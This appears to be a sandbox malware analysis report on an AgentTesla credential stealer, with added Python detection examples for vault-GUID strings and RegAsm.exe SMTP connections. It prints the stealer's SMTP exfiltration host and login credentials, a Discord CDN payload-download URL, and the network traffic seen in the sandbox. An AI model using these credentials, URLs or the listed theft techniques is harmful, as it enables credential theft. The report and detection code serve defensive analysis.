

Windows Analysis Report
450230549.exe

Overview

General Information

Sample name: 450230549.exe
Analysis ID: 1519251
MD5: 5086980f3ee0c035ec304102e6981410
SHA1: fca1625b36a002d77f69586f96744dfbcde1d472
SHA256: bfcef30ac8c0270957b3126d0b9046ddd4bc67fdffea077dd0a127809aa233a6
Tags: exe, user-lowmal3

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 450230549.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\450230549.exe" MD5: 5086980F3EE0C035EC304102E6981410)
    • RegAsm.exe (PID: 6444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 4136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.zqamcx.com", "Username": "server1@zqamcx.com", "Password": "Anambraeast@"}
Source | Rule | Description | Author
00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(9 further entries not shown)
Source | Rule | Description | Author | Strings
0.2.450230549.exe.385caa0.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.450230549.exe.385caa0.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.450230549.exe.385caa0.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | matched strings:
  • 0x32a43:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32ab5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x32b3f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32bd1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x32c3b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32cad:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32d43:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32dd3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegAsm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
3.2.RegAsm.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
(20 further entries not shown)
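The INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID hit above is a plain string-content rule: the unpacked payload carries the GUIDs of the Windows Credential Vault schemas it intends to read. The scanner below is an added example written for this page, not ditekSHen's YARA rule, and reproduces the logic behind that hit: it searches an unpacked PE for the eight GUIDs listed in the table, in both ASCII and UTF-16LE form (a .NET assembly stores its string literals in the #US heap as UTF-16LE, which is what YARA's `wide` modifier covers), and requires the MZ magic. The three-distinct-GUID threshold, the `build_sample` stand-in for a real unpacked PE and all function names are assumptions, not the rule's own text.

```python
"""Added example: logic behind the INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
hit, not ditekSHen's YARA rule. Looks for the eight vault schema GUIDs in
ASCII and UTF-16LE ("wide") form and gates on the MZ header. The
three-distinct-GUID threshold is an assumption."""

# The eight GUIDs the rule matched in 0.2.450230549.exe.385caa0.1.unpack.
VAULT_SCHEMA_GUIDS = (
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5",
    "3CCD5499-87A8-4B10-A215-608888DD3B55",
    "154E23D0-C644-4E6F-8CE6-5069272F999F",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548",
)


def find_vault_guids(data: bytes) -> dict:
    """Return {guid: [(offset, encoding), ...]} for every occurrence of a
    vault schema GUID, checking both encodings that 'ascii wide' would.
    .NET user strings are UTF-16LE, so the wide form is the one that
    fires on an unpacked managed payload."""
    hits = {}
    for guid in VAULT_SCHEMA_GUIDS:
        for encoding, needle in (("ascii", guid.encode("ascii")),
                                 ("wide", guid.encode("utf-16-le"))):
            start = 0
            while (idx := data.find(needle, start)) != -1:
                hits.setdefault(guid, []).append((idx, encoding))
                start = idx + 1
    return hits


def matches_vault_schema_rule(data: bytes, min_distinct: int = 3) -> bool:
    """PE magic plus at least min_distinct different GUIDs. Counting
    distinct GUIDs rather than raw hits keeps a file that repeats one GUID
    many times (a registry export, documentation) from matching."""
    if data[:2] != b"MZ":
        return False
    return len(find_vault_guids(data)) >= min_distinct


def build_sample(ascii_guids, wide_guids) -> bytes:
    """Constructed stand-in for an unpacked PE (assumption, not a real
    dump): MZ magic and padding, then the given GUIDs as NUL-terminated
    ASCII and UTF-16LE literals."""
    blob = b"MZ" + b"\x90" * 62
    for g in ascii_guids:
        blob += g.encode("ascii") + b"\x00"
    for g in wide_guids:
        blob += g.encode("utf-16-le") + b"\x00\x00"
    return blob


if __name__ == "__main__":
    sample = build_sample(VAULT_SCHEMA_GUIDS[:2], VAULT_SCHEMA_GUIDS[2:5])
    for guid, where in find_vault_guids(sample).items():
        print(guid, where)
    print("rule match:", matches_vault_schema_rule(sample))
```

Run it against a dumped payload by replacing `sample` with `open(path, "rb").read()`; the offsets it prints are file offsets in the dump, comparable to the 0x32a43-style offsets in the table above. The distinct-GUID threshold is what keeps the check from firing on a credential-manager utility that mentions a single schema.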

                    Networking

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 78.110.166.82, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 4136, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                    No Suricata rule has matched
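Two records in this report carry most of the detection value: the process tree, in which a loader on the user's desktop starts RegAsm.exe three times (PIDs 6444, 5324, 4136) with no assembly to register, and the Sigma network-connection match above, in which one of those RegAsm.exe instances (PID 4136) opens TCP 587 to 78.110.166.82. The code below is an added example written for this page, not Joe Sandbox or Sigma code. It evaluates both conditions over Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records written in the same `Key: value, Key: value` layout as the Data field above. The event records are constructed (the two benign controls, the rule names, the severity levels and the port list are assumptions), and the correlation by ProcessId is what lets one alert show the loader-to-RegAsm-to-SMTP chain.

```python
"""Added example: flag RegAsm.exe used as a hollowing target and phoning
home over SMTP, from Sysmon-style EventID 1 / EventID 3 records. Not Joe
Sandbox or Sigma code; the records below are constructed."""
import re

# Submission and classic SMTP ports; 2525 is a common alternate (assumption).
SMTP_PORTS = {25, 465, 587, 2525}
REGASM_IMAGE_RE = re.compile(r"\\regasm\.exe$", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(users|programdata)\\", re.IGNORECASE)
# Accepts  "<path>\RegAsm.exe" args  as well as  <path>\RegAsm.exe args
REGASM_CMDLINE_RE = re.compile(r'^\s*"?[^"]*?regasm\.exe"?\s*(?P<args>.*)$',
                               re.IGNORECASE | re.DOTALL)


def parse_event(line: str) -> dict:
    """Parse 'Key: value, Key: value' into a dict (the layout of the
    report's Data field). Values in this layout never contain ', '."""
    fields = {}
    for part in line.split(", "):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def regasm_without_assembly(ev: dict):
    """EventID 1: RegAsm.exe started with an empty argument list.
    Legitimate use is 'RegAsm.exe <assembly> [/codebase|/tlb ...]', so no
    argument means the process exists only to receive injected code. A
    parent in a user-writable path, as in the report's tree, is high."""
    if ev.get("EventID") != "1" or not REGASM_IMAGE_RE.search(ev.get("Image", "")):
        return None
    m = REGASM_CMDLINE_RE.match(ev.get("CommandLine", ""))
    if m and m.group("args").strip():
        return None  # an assembly or switches were passed: ordinary use
    parent = ev.get("ParentImage", "")
    return {"rule": "regasm_no_assembly_argument", "pid": ev.get("ProcessId"),
            "severity": "high" if USER_WRITABLE_RE.match(parent) else "medium",
            "parent": parent}


def regasm_smtp_connection(ev: dict):
    """EventID 3: RegAsm.exe initiating TCP to an SMTP port (the 'RegAsm
    connects to smtp port' Sigma match). RegAsm has no reason to speak
    SMTP at all, so no destination allow-list is needed."""
    if ev.get("EventID") != "3" or ev.get("Initiated", "").lower() != "true":
        return None
    if not REGASM_IMAGE_RE.search(ev.get("Image", "")):
        return None
    if ev.get("Protocol", "tcp").lower() != "tcp":
        return None
    try:
        port = int(ev.get("DestinationPort", ""))
    except ValueError:
        return None
    if port not in SMTP_PORTS:
        return None
    return {"rule": "regasm_smtp_connection", "pid": ev.get("ProcessId"),
            "severity": "high",
            "destination": f"{ev.get('DestinationIp')}:{port}"}


def run_detection(lines):
    """Run both rules; attach the parent recorded for the same PID to every
    alert so one record shows loader -> RegAsm.exe -> SMTP."""
    events = [parse_event(line) for line in lines]
    parents = {ev.get("ProcessId"): ev.get("ParentImage", "")
               for ev in events if ev.get("EventID") == "1"}
    alerts = []
    for ev in events:
        for rule in (regasm_without_assembly, regasm_smtp_connection):
            hit = rule(ev)
            if hit:
                hit.setdefault("parent", parents.get(hit["pid"], ""))
                alerts.append(hit)
    return alerts


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
LOADER = r"C:\Users\user\Desktop\450230549.exe"

# Constructed records: 1, 2 and 4 mirror the report's tree and connection;
# 3 (an installer registering a COM-visible DLL) and 5 (a mail client on
# 587) are benign controls and must not alert.
SAMPLE_EVENTS = [
    f'EventID: 1, Image: {LOADER}, CommandLine: "{LOADER}", '
    f"ParentImage: C:\\Windows\\explorer.exe, ProcessId: 7068",
    f'EventID: 1, Image: {REGASM}, CommandLine: "{REGASM}", '
    f"ParentImage: {LOADER}, ProcessId: 4136",
    f'EventID: 1, Image: {REGASM}, CommandLine: "{REGASM}" /codebase '
    f"C:\\Program Files\\Vendor\\Interop.dll, "
    f"ParentImage: C:\\Program Files\\Vendor\\setup.exe, ProcessId: 5120",
    f"EventID: 3, Image: {REGASM}, Initiated: true, Protocol: tcp, "
    f"SourceIp: 192.168.2.4, SourcePort: 49733, "
    f"DestinationIp: 78.110.166.82, DestinationPort: 587, ProcessId: 4136",
    f"EventID: 3, Image: C:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe, "
    f"Initiated: true, Protocol: tcp, SourceIp: 192.168.2.4, SourcePort: 49800, "
    f"DestinationIp: 203.0.113.25, DestinationPort: 587, ProcessId: 2200",
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert)
```

The no-argument check is the part worth keeping on its own: RegAsm.exe with an empty command line has no legitimate purpose, and the same test applies to the other .NET utilities commonly hollowed in the same way (RegSvcs.exe, MSBuild.exe, InstallUtil.exe). The comma-split parser is only adequate for this layout; on real Sysmon XML or EVTX, read the fields from the event rather than re-parsing a rendered message.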


                    AV Detection

Source: 0.2.450230549.exe.385caa0.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.zqamcx.com", "Username": "server1@zqamcx.com", "Password": "Anambraeast@"}
Source: 450230549.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 450230549.exe | Joe Sandbox ML: detected
Source: 450230549.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: 450230549.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: HSDSDF32.pdb( source: 450230549.exe
Source: Binary string: HSDSDF32.pdb source: 450230549.exe

                    Networking

Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
Source: global traffic | TCP traffic: 192.168.2.4:49733 -> 78.110.166.82:587
Source: global traffic | HTTP traffic detected: GET /attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& HTTP/1.1 | Host: cdn.discordapp.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 78.110.166.82
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: UKSERVERS-ASUKDedicatedServersHostingandCo-Location
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: mail.zqamcx.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: 450230549.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 450230549.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 450230549.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 450230549.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com
Source: 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.comd
Source: 450230549.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 450230549.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 450230549.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 450230549.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 450230549.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.zqamcx.com
Source: 450230549.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: 450230549.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: 450230549.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: 450230549.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0#
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
Source: 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 450230549.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://zqamcx.com
Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com
Source: 450230549.exe | String found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.450230549.exe.385caa0.1.raw.unpack, n00.cs | .Net Code: MeS
Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, n00.cs | .Net Code: MeS
Source: 0.2.450230549.exe.3820c80.2.raw.unpack, n00.cs | .Net Code: MeS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\450230549.exe | Code function: 0_2_00D311D8
Source: C:\Users\user\Desktop\450230549.exe | Code function: 0_2_00D32B28
Source: C:\Users\user\Desktop\450230549.exe | Code function: 0_2_00D32B19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EAB303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EA4BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EAEE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EA3FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EA4318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_060F2168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_060F2163
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06175590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061765F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0617B22A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06173050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0617C180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06177D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_061776A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0617E398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06170040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_06175CDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0617001A
Source: 450230549.exe | Static PE information: invalid certificate
Source: 450230549.exe, 00000000.00000002.1722663773.00000000009DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 450230549.exe
Source: 450230549.exe, 00000000.00000000.1701465729.00000000003E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHSDSDF32.exe2 vs 450230549.exe
Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename823aa2f5-346d-4241-a1e4-da92c87486de.exe4 vs 450230549.exe
Source: 450230549.exe, 00000000.00000002.1725521175.00000000027B2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename823aa2f5-346d-4241-a1e4-da92c87486de.exe4 vs 450230549.exe
Source: 450230549.exe | Binary or memory string: OriginalFilenameHSDSDF32.exe2 vs 450230549.exe
Source: 450230549.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 450230549.exe, DyyVDbaRvM1YfIq9il.cs | Cryptographic APIs: 'CreateDecryptor' (2 occurrences)
Source: 450230549.exe, AesHelper.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
Source: 0.2.450230549.exe.385caa0.1.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@7/1@4/3
Source: C:\Users\user\Desktop\450230549.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\450230549.exe.log
